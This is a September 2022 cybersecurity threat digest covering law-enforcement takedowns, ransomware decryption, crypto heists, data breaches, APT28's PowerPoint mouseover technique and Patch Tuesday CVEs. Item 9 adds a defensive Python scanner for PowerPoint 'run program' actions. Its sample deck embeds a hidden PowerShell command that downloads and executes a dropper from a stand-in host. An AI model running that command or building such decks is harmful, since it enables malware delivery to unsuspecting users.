
InForce Cyber

Threat Report September 2022 

1. Authorities Shut Down WT1SHOP Site

An international law enforcement operation has resulted in the dismantling of WT1SHOP, an online criminal marketplace that specialized in the sale of stolen login credentials and other personal information. The seizure was orchestrated by Portuguese authorities, with U.S. officials taking control of four domains used by the website: "wt1shop[.]net," "wt1store[.]cc," "wt1store[.]com," and "wt1store[.]net." The website peddled over 5.85 million records of personally identifying information (PII), including approximately 25,000 scanned driver's licenses/passports, 1.7 million login credentials for various online shops, 108,000 bank accounts, and 21,800 credit cards, the U.S. Justice Department (DoJ) said.

2. U.S. Seizes Cryptocurrency Stolen by Lazarus Group

More than $30 million worth of cryptocurrency plundered by the North Korea-linked Lazarus Group from online video game Axie Infinity has been recovered, marking the first time digital assets stolen by the threat actor have been seized.

"The seizures represent approximately 10% of the total funds stolen from Axie Infinity (accounting for price differences between time stolen and seized) and demonstrate that it is becoming more difficult for bad actors to cash out their ill-gotten crypto gains successfully," Erin Plante, senior director of investigations at Chainalysis, said.

3. Iranian Hackers Target High-Value Targets in Nuclear Security and Genomic Research

Hackers tied to the Iranian government have been targeting individuals specializing in Middle Eastern affairs, nuclear security, and genome research as part of a new social engineering campaign designed to hunt for sensitive information.

Enterprise security firm Proofpoint attributed the targeted attacks to a threat actor named TA453, which broadly overlaps with cyber activities monitored under the monikers APT42, Charming Kitten, and Phosphorus.

It all starts with a phishing email impersonating legitimate individuals at Western foreign policy research organizations, ultimately designed to gather intelligence on behalf of Iran's Islamic Revolutionary Guard Corps (IRGC). The sock puppet accounts include people from the Pew Research Center, the Foreign Policy Research Institute (FPRI), the U.K.'s Chatham House, and the scientific journal Nature. What differentiates this from other phishing attacks is the use of a tactic Proofpoint calls Multi-Persona Impersonation (MPI), wherein the threat actor employs not one but several actor-controlled personas in the same email conversation to bolster the chances of success: the fake colleagues reply to each other, so the target sees an apparently ongoing exchange rather than a single cold email. The technique is said to have been deployed in mid-June 2022.

4. Free Decryptor for LockerGoga Ransomware

A decryptor for the LockerGoga ransomware has been made available by Romanian cybersecurity firm Bitdefender in collaboration with Europol, the No More Ransom project, and Zurich law enforcement authorities.

Identified in January 2019, LockerGoga drew headlines for its attacks against the Norwegian aluminum giant Norsk Hydro. It is said to have infected more than 1,800 victims in 71 countries, causing an estimated $104 million in damages. The ransomware operation received a significant blow in October 2021 when 12 people connected to the group, as well as to the MegaCortex and Dharma operations, were apprehended as part of an international law enforcement effort. The Zurich Cantonal Police further said it spent the past months examining the data storage devices confiscated from the individuals during the 2021 arrests and identified numerous private keys that were used to lock the data. A decryption utility for MegaCortex is also expected to be published in the coming months. Victimized parties are also recommended to file a criminal complaint in their respective home countries.

"These keys enable the aggrieved companies and institutions to recover the data that was previously encrypted with the malware LockerGoga or MegaCortex," the agency said.

5. Crypto Trading Firm Wintermute Loses $160 Million in Hacking Incident

In what is the latest crypto heist to target the decentralized finance (DeFi) space, hackers have stolen digital assets worth around $160 million from crypto trading firm Wintermute.

The hack involved a series of unauthorized transactions that transferred USD Coin, Binance USD, Tether USD, Wrapped ETH, and 66 other cryptocurrencies to the attacker’s wallet.

The company said the security incident had not impacted its centralized finance (CeFi) and over-the-counter (OTC) operations. It did not disclose when the hack took place.

6. Ukraine Arrests Cybercrime Group

Ukrainian law enforcement authorities on Friday disclosed that they had "neutralized" a hacking group operating from the city of Lviv that, they said, acted on behalf of Russian interests. The group specialized in the sale of 30 million accounts belonging to citizens of Ukraine and the European Union on the dark web and netted a profit of $372,000 (14 million UAH) through electronic payment systems like YooMoney, Qiwi, and WebMoney, which are outlawed in the country. "Their 'wholesale clients' were pro-Kremlin propagandists," the Security Service of Ukraine (SSU) said in a press release. "It was them who used the received identification data of Ukrainian and foreign citizens to spread fake 'news' from the front and sow panic."

7. Hacker Behind Optus Breach Releases 10,200 Customer Records

The Australian Federal Police (AFP) on Monday disclosed it is working to gather "crucial evidence" and that it is collaborating with overseas law enforcement authorities following the hack of telecom provider Optus. "Operation Hurricane has been launched to identify the criminals behind the alleged breach and to help shield Australians from identity fraud," the AFP said in a statement. The development comes after Optus, Australia's second-largest wireless carrier, disclosed on September 22, 2022, that it was a victim of a cyberattack. It claimed it "immediately shut down the attack" as soon as it came to light. The threat actor behind the breach also briefly released a sample of 10,200 records from the breach – putting those users at heightened risk of fraud – in addition to asking for $1 million as part of an extortion demand. The dataset has since been taken down, with the attacker claiming to have deleted the only copy of the stolen data.

8. Critical WhatsApp Bugs

WhatsApp has released security updates to address two flaws in its messaging app for Android and iOS that could lead to remote code execution on vulnerable devices. One of them is CVE-2022-36934 (CVSS score: 9.8), a critical integer overflow vulnerability in WhatsApp that results in the execution of arbitrary code simply by establishing a video call. The issue impacts WhatsApp and WhatsApp Business for Android and iOS prior to version 2.22.16.12; check the installed build in the app's settings and update from the store if it is older.

9. Hackers Using PowerPoint Mouseover Trick to Infect Systems

The Russian state-sponsored threat actor known as APT28 has been found leveraging a new code execution method that uses mouse movement in decoy Microsoft PowerPoint documents to deploy malware. No macro is involved: the trigger is a PowerPoint hyperlink action attached to an object on the slide, so macro-blocking policies do not stop it. The technique "is designed to be triggered when the user starts the presentation mode and moves the mouse," cybersecurity firm Cluster25 said in a technical report. "The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive."
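A PowerPoint "run program" hyperlink action lives in the slide XML inside the .pptx zip: an a:hlinkMouseOver (or a:hlinkClick) element with action="ppaction://program", whose r:id points at an external relationship in the slide's .rels part, and that relationship's Target is the command line PowerPoint will execute. The scanner below is an added example, not code from the original report or from Cluster25: it opens a deck as the zip it is, walks every slide for such actions and resolves the command. The two-slide sample deck it builds in memory, the PowerShell command line and the example.invalid URL are constructed for the demo and are not taken from a real sample.

```python
"""Scan a .pptx for PowerPoint "run program" hyperlink actions (ppaction://program).

Added example; not code from the original report or from Cluster25. Stdlib only.
The two-slide deck, the command line and the example.invalid URL below are
constructed for the demo and are not taken from a real sample.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "a": "http://schemas.openxmlformats.org/drawingml/2006/main",
    "r": "http://schemas.openxmlformats.org/officeDocument/2006/relationships",
    "rel": "http://schemas.openxmlformats.org/package/2006/relationships",
}
R_ID = "{%s}id" % NS["r"]                    # the r:id attribute that points into the .rels part
TRIGGERS = ("hlinkMouseOver", "hlinkClick")  # hover fires without a click; both are checked


def _rels_for(zf, slide_path):
    """Map rId -> Target for one slide part (ppt/slides/slideN.xml -> _rels/slideN.xml.rels)."""
    folder, name = slide_path.rsplit("/", 1)
    rels_path = f"{folder}/_rels/{name}.rels"
    if rels_path not in zf.namelist():
        return {}
    root = ET.fromstring(zf.read(rels_path))
    return {rel.get("Id"): rel.get("Target") for rel in root.findall("rel:Relationship", NS)}


def find_program_actions(pptx_bytes):
    """Return [(slide_part, trigger, command)] for every hlinkMouseOver/hlinkClick whose
    action is ppaction://program. The command PowerPoint would run is the external
    relationship Target that the element's r:id resolves to."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(pptx_bytes)) as zf:
        slides = sorted(p for p in zf.namelist() if re.fullmatch(r"ppt/slides/slide\d+\.xml", p))
        for slide in slides:
            rels = _rels_for(zf, slide)
            root = ET.fromstring(zf.read(slide))
            for trigger in TRIGGERS:
                for el in root.iter("{%s}%s" % (NS["a"], trigger)):
                    if el.get("action", "").startswith("ppaction://program"):
                        hits.append((slide, trigger, rels.get(el.get(R_ID), "<unresolved rId>")))
    return hits


# --- constructed sample deck (not a real malicious document) ---------------------------
SLIDE_TMPL = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sld xmlns:a="{a}" xmlns:r="{r}" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:cSld><p:spTree>
    <p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr/>
    <p:pic><p:nvPicPr><p:cNvPr id="2" name="Picture 1"><a:{trigger} r:id="rId2"{action}/></p:cNvPr>
    <p:cNvPicPr/><p:nvPr/></p:nvPicPr><p:blipFill/><p:spPr/></p:pic>
  </p:spTree></p:cSld>
</p:sld>
"""
RELS_TMPL = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{rel}">
  <Relationship Id="rId1" Type="{r}/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="{r}/hyperlink" Target="{target}" TargetMode="External"/>
</Relationships>
"""
# Hypothetical command line standing in for the "download a dropper and run it" step.
SAMPLE_CMD = ("powershell.exe -NoP -W Hidden -c "
              "IEX((New-Object Net.WebClient).DownloadString('https://example.invalid/dropper.ps1'))")


def build_sample_deck():
    """Slide 1 carries a mouseover run-program action; slide 2 a harmless web hyperlink."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("ppt/slides/slide1.xml", SLIDE_TMPL.format(
            a=NS["a"], r=NS["r"], trigger="hlinkMouseOver", action=' action="ppaction://program"'))
        zf.writestr("ppt/slides/_rels/slide1.xml.rels",
                    RELS_TMPL.format(rel=NS["rel"], r=NS["r"], target=SAMPLE_CMD))
        zf.writestr("ppt/slides/slide2.xml", SLIDE_TMPL.format(
            a=NS["a"], r=NS["r"], trigger="hlinkClick", action=""))
        zf.writestr("ppt/slides/_rels/slide2.xml.rels",
                    RELS_TMPL.format(rel=NS["rel"], r=NS["r"], target="https://example.invalid/"))
    return buf.getvalue()


if __name__ == "__main__":
    for slide, trigger, command in find_program_actions(build_sample_deck()):
        print(f"{slide}: {trigger} -> {command}")
```

To run it against a real deck, pass `open(path, "rb").read()` to `find_program_actions`. The match is on the `action` attribute rather than on which trigger carries it, so a click-triggered variant of the same trick is reported as well; an ordinary web hyperlink (slide 2 of the sample, no `action` attribute) is not. The sample deck is deliberately minimal and lacks the `[Content_Types].xml` and `presentation.xml` parts PowerPoint itself would need; the scanner only looks at the slide parts and their `.rels`.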

10. 85 Apps with 13 Million Downloads Involved in Ad Fraud Scheme

As many as 75 apps on Google Play and 10 on the Apple App Store have been discovered engaging in ad fraud as part of an ongoing campaign that commenced in 2019. The latest iteration, dubbed Scylla by online fraud-prevention firm HUMAN Security, follows similar attack waves in August 2019 and late 2020 that went by the codenames Poseidon and Charybdis, respectively. Prior to their removal from the app storefronts, the apps had been collectively installed more than 13 million times.

11. Microsoft September 2022 Patch Tuesday

Microsoft has released 63 security patches for its September 2022 Patch Tuesday rollout. Five vulnerabilities are rated Critical, 57 are rated Important, one is Moderate, and one is rated Low in severity. This month's release includes a bug discovered by CrowdStrike in conjunction with other security researchers: CVE-2022-37969, an elevation-of-privilege flaw in the Windows Common Log File System (CLFS) driver, is publicly known, and there is evidence it has been exploited in the wild, so it should be patched first even though it is not rated Critical.

Here are the most notable CVEs released by Microsoft for September 2022 (the three CVSS 9.8 network-reachable bugs in TCP/IP and IKE are the ones to prioritize on exposed hosts):

Severity   CVSS  CVE              Description
Critical   9.8   CVE-2022-34718   Windows TCP/IP Remote Code Execution Vulnerability
Critical   9.8   CVE-2022-34721   Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability
Critical   9.8   CVE-2022-34722   Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability
Critical   8.8   CVE-2022-34700   Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability
Critical   8.8   CVE-2022-35805   Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability
Important  8.8   CVE-2022-38009   Microsoft SharePoint Server Remote Code Execution Vulnerability
Important  8.8   CVE-2022-38008   Microsoft SharePoint Server Remote Code Execution Vulnerability
Important  8.8   CVE-2022-37961   Microsoft SharePoint Server Remote Code Execution Vulnerability
Important  8.1   CVE-2022-35823   Microsoft SharePoint Server Remote Code Execution Vulnerability
Important  8.1   CVE-2022-33647   Windows Kerberos Elevation of Privilege Vulnerability
Important  8.1   CVE-2022-33679   Windows Kerberos Elevation of Privilege Vulnerability

[Figure 1. Breakdown of products affected by September 2022 Patch Tuesday]

[Figure 2. Breakdown of September 2022 Patch Tuesday attack types]

[Figure 3. The escalation path of a ransomware attack across the kill chain]

[Figure 4. Graphic representation of a botnet attack]